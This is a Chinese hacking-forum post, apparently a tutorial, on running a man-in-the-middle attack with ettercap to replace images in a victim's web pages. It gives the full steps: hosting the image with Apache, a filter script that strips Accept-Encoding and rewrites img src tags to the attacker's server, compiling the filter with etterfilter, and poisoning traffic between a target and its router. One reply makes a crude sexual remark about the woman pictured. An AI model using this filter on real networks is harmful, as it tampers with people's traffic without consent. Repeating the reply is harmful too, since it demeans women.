admin 发表于 2018-5-27 19:00:04

中间人攻击(二)替换图片

一:先准备一张图片


恩恩!低调点好!
我们将图片放大kali的var/www/html目录下
二:启动Apache

servce apache2 start

三:编写攻击脚本

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
msg("过滤执行.\n");
}

然后另存为alert.filter文件
四:将alert.filter转变为二进制文件

etterfilter alert.filter -o alert.ef


五:利用ettercap进行中间人攻击

将目标添加为1 路由器自身添加为2
然后我们载入刚才生成的脚本

然后开始中间人攻击


priess1314 发表于 2018-5-27 23:20:25

我觉得这女的胸不是很大,也不是很翘!大家说说看!

piupiupiu 发表于 2018-5-28 11:36:22

解析正常,但是网页都无法打开
页: [1]
查看完整版本: 中间人攻击(二)替换图片